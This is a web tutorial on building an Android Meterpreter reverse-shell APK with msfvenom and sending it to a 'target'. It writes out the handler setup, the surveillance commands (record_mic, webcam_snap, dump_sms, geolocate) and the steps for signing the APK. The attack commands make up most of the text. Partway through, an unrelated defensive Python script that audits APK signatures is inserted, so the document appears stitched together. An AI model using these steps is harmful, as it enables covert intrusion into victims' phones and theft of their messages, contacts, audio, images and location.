Hack Android Mobile Phone using MSFVenom Kali Linux


In this tutorial you will learn how to hack any Android mobile phone using MSFVenom.


Linux Based Operating System (In this tutorial we are using Kali Linux 2017.2)
Metasploit Framework

MSFVenom is a hacking tool that targets the Android operating system. The tool is a combination of MSFEncode & MSFPayload.

OK, now let's get started. Open up a new terminal and enter the following command. This command sets our payload and creates our custom executable.

# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > hack.apk


If you don’t know what your LHOST is you can look it up using ifconfig.

# ifconfig

You have now finished creating your malicious .apk file; it will be saved to your /home/ folder. Locate your newly created .apk (hack.apk) and send it to your target.

Now we need to start Metasploit framework and set up a multi handler. This is a special payload, as typically a Meterpreter payload is multistage, where a minimal amount of code is sent as part of the exploit, and then more is uploaded after code execution has been accomplished.

Open up a new terminal and use the following command to start Metasploit framework. Once the console has started, set up your multi/handler.

# msfconsole

msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

When the target clicks on the malicious app from the Android Main Activity Menu, a session between Metasploit and the Android phone will be established. To list new sessions you can use the command sessions -i. To connect to a new session, use the command sessions -i 1, replacing 1 with the session id you want to connect with.


You may like to try out some of these useful exploit commands:

– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

Signing Methods

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk alias_name
jarsigner -verify -verbose -certs APPNAME.apk

Zipalign (Does not come pre-installed in Kali Linux)

Install Zipalign

apt-get install zipalign
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

Alternatively, if you prefer to sign your .apk file directly from your Android device, you can sign your .apk files with ZipSigner, an Android app that signs update.zip files, APK, or JAR files using your own private keys or one of the four built-in certificates (media, platform, shared, testkey). All output is automatically zip-aligned. ZipSigner combines the functions of jarsigner, signapk, keytool, and zipalign.
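For anyone triaging an APK signed the way the jarsigner command above does (v1 JAR signing with -digestalg SHA1), the following added example, which is not part of the original tutorial, reads META-INF/MANIFEST.MF, reports weak digest algorithms, and recomputes each entry's digest to spot files changed or added after signing. It does not validate the certificate or the .SF/.RSA signature itself, it ignores the newer APK signature schemes, and the function names and the sample archive are constructed for illustration.

```python
import base64, hashlib, io, zipfile
WEAK = {"SHA1", "MD5"}  # digest names treated as weak for v1 (JAR) signing

def parse_manifest(text):
    """Return {entry name: {digest algorithm: base64 digest}} from MANIFEST.MF text."""
    text = text.replace("\r\n", "\n").replace("\n ", "")  # unfold continuation lines
    entries = {}
    for section in text.split("\n\n"):
        attrs = dict(l.split(": ", 1) for l in section.split("\n") if ": " in l)
        if "Name" in attrs:
            entries[attrs["Name"]] = {k[:-7].replace("-", ""): v
                                      for k, v in attrs.items() if k.endswith("-Digest")}
    return entries

def audit_apk(data):
    """Audit the v1 signing metadata of an APK passed as bytes (no certificate checks)."""
    report = {"signature_files": [], "weak_digests": set(), "mismatched": [], "unlisted": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        report["signature_files"] = [n for n in names if n.startswith("META-INF/")
                                     and n.rsplit(".", 1)[-1] in ("SF", "RSA", "DSA", "EC")]
        raw = z.read("META-INF/MANIFEST.MF") if "META-INF/MANIFEST.MF" in names else b""
        listed = parse_manifest(raw.decode("utf-8"))
        for name in names:
            if name.startswith("META-INF/") or name.endswith("/"):
                continue  # simplification: signing metadata and directories are skipped
            if name not in listed:
                report["unlisted"].append(name)  # in the archive, absent from the manifest
                continue
            for alg, b64 in listed[name].items():
                report["weak_digests"] |= {alg} & WEAK
                actual = base64.b64encode(hashlib.new(alg.lower(), z.read(name)).digest())
                if actual.decode() != b64:
                    report["mismatched"].append(name)  # content changed after signing
    return report

def build_sample(tamper=False):
    """Constructed APK-like zip: one entry and a manifest carrying its SHA1 digest."""
    body = b"constructed dex bytes"
    digest = base64.b64encode(hashlib.sha1(body).digest()).decode()
    manifest = "Manifest-Version: 1.0\r\n\r\nName: classes.dex\r\nSHA1-Digest: %s\r\n\r\n" % digest
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\r\n")
        z.writestr("classes.dex", body + (b"!" if tamper else b""))
    return buf.getvalue()

if __name__ == "__main__":
    print(audit_apk(build_sample(tamper=True)))
```

To check a real file, pass its bytes: audit_apk(open(path, "rb").read()).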

Download ZipSigner

We have now come to the end of this tutorial. Enjoy, and please consider sharing this tutorial with your friends and on social media.